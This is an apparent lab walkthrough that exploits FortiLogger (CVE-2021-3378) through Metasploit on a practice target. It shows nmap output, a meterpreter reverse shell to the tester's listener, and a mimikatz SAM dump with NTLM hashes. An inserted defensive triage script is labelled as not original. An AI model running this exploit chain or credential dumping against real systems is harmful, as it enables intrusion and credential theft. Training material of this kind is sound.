Daily Practice
Problem
Solution
Question 1
First, run an nmap scan to gather information about the target.
┌──(root㉿HgTrojan)-[~]
└─# nmap -sV -sC 10.129.203.65
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-26 02:57 EST
Nmap scan report for 10.129.203.65
Host is up (0.66s latency).
Not shown: 995 closed tcp ports (reset)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-01-26T07:58:43+00:00; -1s from scanner time.
| rdp-ntlm-info:
| Target_Name: WIN-51BJ97BCIPV
| NetBIOS_Domain_Name: WIN-51BJ97BCIPV
| NetBIOS_Computer_Name: WIN-51BJ97BCIPV
| DNS_Domain_Name: WIN-51BJ97BCIPV
| DNS_Computer_Name: WIN-51BJ97BCIPV
| Product_Version: 10.0.17763
|_ System_Time: 2024-01-26T07:58:33+00:00
| ssl-cert: Subject: commonName=WIN-51BJ97BCIPV
| Not valid before: 2024-01-25T07:56:59
|_Not valid after: 2024-07-26T07:56:59
5000/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-IIS/10.0
|_http-title: FortiLogger | Log and Report System
| http-methods:
|_ Potentially risky methods: TRACE
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-01-26T07:58:37
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 68.72 seconds
We find a web service, "FortiLogger", on port 5000 of the target.
Given that, the first step is to search Google for a publicly known vulnerability in it.
Fortunately, there is indeed a public vulnerability, and Metasploit can exploit it directly, so let's verify whether our target is affected.
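Before reaching for an exploit module, the same scan output can be read from the defender's side: which exposures does it show, and does the reported version fall inside the affected range? The script below is an added example and is not part of the original write-up or of any FortiLogger or Metasploit code. It parses a trimmed copy of the nmap report above (embedded as a constructed sample), lists the findings a reviewer would act on, and compares a version string against a fixed-version boundary. The boundary "5.2.0" is taken from the Metasploit module's target label ("FortiLogger < 5.2.0") and is an assumption here, not a vendor statement.

```python
"""Defender-side triage of an `nmap -sV -sC` report (added example)."""
import re

# Constructed sample: a trimmed copy of the scan output from this page.
NMAP_OUTPUT = """\
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
|   Product_Version: 10.0.17763
5000/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-IIS/10.0
|_http-title: FortiLogger | Log and Report System
| http-methods:
|_  Potentially risky methods: TRACE
Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
"""

# "<port>/<proto> <state> <service> [<version text>]"
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)\s*(.*)$")


def parse_report(text):
    """Split a normal-format nmap report into per-port records and the
    host-level script output. NSE lines (starting with '|') are attached
    to the port line that precedes them."""
    ports, host_scripts = [], []
    current, in_host = None, False
    for line in text.splitlines():
        if line.startswith("Host script results"):
            in_host, current = True, None
            continue
        m = PORT_RE.match(line)
        if m and not in_host:
            current = {"port": int(m.group(1)), "proto": m.group(2),
                       "state": m.group(3), "service": m.group(4),
                       "version": m.group(5).strip(), "scripts": []}
            ports.append(current)
            continue
        if line.startswith("|"):
            script = line.lstrip("|_ ").strip()
            if in_host:
                host_scripts.append(script)
            elif current is not None:
                current["scripts"].append(script)
            continue
        current = None  # any other line ends the current port block
    return ports, host_scripts


def triage(text):
    """Return human-readable findings for the conditions visible in the
    scan: RDP reachable, exposed FortiLogger UI, HTTP TRACE, SMB signing
    optional."""
    ports, host_scripts = parse_report(text)
    findings = []
    for p in ports:
        if p["state"] != "open":
            continue
        scripts = " ".join(p["scripts"])
        if p["port"] == 3389:
            findings.append("port 3389: RDP reachable from the scanner; "
                            "restrict it to management networks")
        if "FortiLogger" in scripts:
            findings.append(f"port {p['port']}: FortiLogger web UI exposed; "
                            "confirm its version against the vendor advisory")
        if "TRACE" in scripts:
            findings.append(f"port {p['port']}: HTTP TRACE enabled; "
                            "disable it unless required")
    if any("not required" in s for s in host_scripts):
        findings.append("SMB signing enabled but not required; "
                        "require signing on the server")
    return findings


def parse_version(s):
    return tuple(int(part) for part in s.split("."))


def is_affected(version, fixed="5.2.0"):
    """True when `version` sorts below the first fixed release. Comparison
    is component-wise so that 4.10.0 is newer than 4.4.2.2; shorter
    tuples are right-padded with zeros. The default boundary is the
    assumption taken from the Metasploit target label."""
    v, f = parse_version(version), parse_version(fixed)
    n = max(len(v), len(f))
    v += (0,) * (n - len(v))
    f += (0,) * (n - len(f))
    return v < f


if __name__ == "__main__":
    for finding in triage(NMAP_OUTPUT):
        print("-", finding)
    # Version reported by the page's automatic check: 4.4.2.2
    print("4.4.2.2 in affected range:", is_affected("4.4.2.2"))
```

Running it prints four findings (RDP exposure, the FortiLogger UI on port 5000, TRACE enabled, and SMB signing not required) and reports that 4.4.2.2 sorts below 5.2.0. The version comparison is deliberately tuple-based rather than a string compare, which is the usual mistake in ad-hoc vulnerability checks.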
┌──(root㉿HgTrojan)-[~]
└─# msfconsole
Metasploit tip: Network adapter names can be used for IP options set LHOST eth0
=[ metasploit v6.3.51-dev ]
+ -- --=[ 2384 exploits - 1235 auxiliary - 418 post ]
+ -- --=[ 1391 payloads - 46 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit Documentation: https://docs.metasploit.com/
msf6 > search CVE-2021-3378
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/http/fortilogger_arbitrary_fileupload 2021-02-26 normal Yes FortiLogger Arbitrary File Upload Exploit
Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/http/fortilogger_arbitrary_fileupload
msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/fortilogger_arbitrary_fileupload) > show options
Module options (exploit/windows/http/fortilogger_arbitrary_fileupload):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 5000 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to the FortiLogger
VHOST no HTTP server virtual host
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.5.10.131 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 FortiLogger < 5.2.0
View the full module info with the info, or info -d command.
msf6 exploit(windows/http/fortilogger_arbitrary_fileupload) > set rhosts 10.129.203.65
rhosts => 10.129.203.65
msf6 exploit(windows/http/fortilogger_arbitrary_fileupload) > set lhost 10.10.16.25
lhost => 10.10.16.25
msf6 exploit(windows/http/fortilogger_arbitrary_fileupload) > exploit
[*] Started reverse TCP handler on 10.10.16.25:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. FortiLogger version 4.4.2.2
[+] Generate Payload
[+] Payload has been uploaded
[*] Executing payload...
[*] Sending stage (175686 bytes) to 10.129.203.65
[*] Meterpreter session 1 opened (10.10.16.25:4444 -> 10.129.203.65:49687) at 2024-01-26 03:11:39 -0500
meterpreter >
Luck is clearly on our side. Next, get a shell and check the username of the account the shell is running as.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
That completes question 1.
Question 2
meterpreter > load kiwi
Loading extension kiwi...
.#####. mimikatz 2.2.0 20191125 (x86/windows)
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
[!] Loaded x86 Kiwi on an x64 architecture.
Success.
meterpreter > lsa_dump_sam
[+] Running as SYSTEM
[*] Dumping SAM
Domain : WIN-51BJ97BCIPV
SysKey : c897d22c1c56490b453e326f86b2eef8
Local SID : S-1-5-21-2348711446-3829538955-3974936019
SAMKey : e52d743c76043bf814df6e48f1efcb23
RID : 000001f4 (500)
User : Administrator
Hash NTLM: bdaffbfe64f1fc646a3353be1c2c3c99
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : d0e507b237b40a3a1f62ba1935465406
* Primary:Kerberos-Newer-Keys *
Default Salt : WIN-51BJ97BCIPVAdministrator
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 545c81812fc803221b22e47ab8789c104f38b151c677fbc4006894db6d174f1b
aes128_hmac (4096) : 5d59bcd0e74c5ed8951b9f2b658eef43
des_cbc_md5 (4096) : 76436b1c190d892a
OldCredentials
aes256_hmac (4096) : a394ab9b7c712a9e0f3edb58404f9cf086132d29ab5b796d937b197862331b07
aes128_hmac (4096) : 7630dab9bdaeebf9b4aa6c595347a0cc
des_cbc_md5 (4096) : 9876615285c2766e
OlderCredentials
aes256_hmac (4096) : 09c55a10e6b955caac4abbf7ff37b81488a2ede67a150c00c775fa00d94768ab
aes128_hmac (4096) : b49643128581ac08a1fae957f7787f72
des_cbc_md5 (4096) : d32592d63b75ec1f
* Packages *
NTLM-Strong-NTOWF
* Primary:Kerberos *
Default Salt : WIN-51BJ97BCIPVAdministrator
Credentials
des_cbc_md5 : 76436b1c190d892a
OldCredentials
des_cbc_md5 : 9876615285c2766e
RID : 000001f5 (501)
User : Guest
RID : 000001f7 (503)
User : DefaultAccount
RID : 000001f8 (504)
User : WDAGUtilityAccount
Hash NTLM: 4b4ba140ac0767077aee1958e7f78070
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 92793b2cbb0532b4fbea6c62ee1c72c8
* Primary:Kerberos-Newer-Keys *
Default Salt : WDAGUtilityAccount
Default Iterations : 4096
Credentials
aes256_hmac (4096) : c34300ce936f766e6b0aca4191b93dfb576bbe9efa2d2888b3f275c74d7d9c55
aes128_hmac (4096) : 6b6a769c33971f0da23314d5cef8413e
des_cbc_md5 (4096) : 61299e7a768fa2d5
* Packages *
NTLM-Strong-NTOWF
* Primary:Kerberos *
Default Salt : WDAGUtilityAccount
Credentials
des_cbc_md5 : 61299e7a768fa2d5
RID : 000003ea (1002)
User : htb-student
Hash NTLM: cf3a5525ee9414229e66279623ed5c58
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : f88979e2a6999b5cbc7a9308e7b4cd82
* Primary:Kerberos-Newer-Keys *
Default Salt : WIN-51BJ97BCIPVhtb-student
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 1ed226feb91bfd21489a12a58c6cb38b99ab70feb30d971c8987fb44bcb15213
aes128_hmac (4096) : 629343148027bcf0d48cf49b066a9960
des_cbc_md5 (4096) : 379791d616ef6d0e
* Packages *
NTLM-Strong-NTOWF
* Primary:Kerberos *
Default Salt : WIN-51BJ97BCIPVhtb-student
Credentials
des_cbc_md5 : 379791d616ef6d0e
meterpreter >
Collecting the relevant part:
RID : 000003ea (1002)
User : htb-student
Hash NTLM: cf3a5525ee9414229e66279623ed5c58
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : f88979e2a6999b5cbc7a9308e7b4cd82
Retrieved: the NTLM password hash of the user "htb-student" is cf3a5525ee9414229e66279623ed5c58.
All of my articles are technical sharing, recorded for defensive purposes; every operation was carried out in a lab environment. Do not use them for any other purpose; you bear the consequences yourself. Unless otherwise stated, all articles on this blog are released under the BY-NC-SA license. Please credit the source when reposting!